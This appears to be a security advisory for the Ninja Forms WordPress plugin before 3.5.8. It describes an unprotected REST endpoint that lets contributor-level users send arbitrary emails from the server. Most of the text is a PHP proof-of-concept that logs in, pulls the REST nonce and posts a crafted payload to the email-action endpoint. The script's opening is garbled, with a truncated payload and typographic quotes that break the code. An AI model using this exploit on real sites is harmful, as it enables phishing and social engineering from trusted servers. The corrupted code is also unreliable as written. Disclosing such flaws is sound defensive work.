Ninja Forms < 3.5.8 - Unprotected REST-API to Email Injection

The plugin is vulnerable to arbitrary email sending via the trigger_email_action function found in the ~/includes/Routes/Submissions.php file, in versions up to and including 3.5.7. This allows authenticated attackers to send arbitrary emails from the affected server via the /ninja-forms-submissions/email-action REST API which can be used to socially engineer victims.

PoC

{all_fields_table}

“,“from_name”:”“,“from_address”:”“,“reply_to”:”“,“email_format”:“html”,“cc”:”“,“bcc”:”“,“attach_csv”:”“,“email_message_plain”:”“,“parent_id”:“2”,“value”:“6”},“formID”:0}‘; // 1) Log in as contributor+ $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), ‘cookiejar-’); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-login.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘log’ => $wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); // Pull the Rest API Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php?action=rest-nonce’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //Rest API Nonce preg_match(’/([^”]+)/', $content, $matches); $restnonce = $matches[1]; //Create New Post $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-json/ninja-forms-submissions/email-action’); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, “POST”); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt( $ch, CURLOPT_HTTPHEADER, array(‘Content-Type: application/json’, “X-WP-Nonce: $restnonce”, “Content-Length: $length”)); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>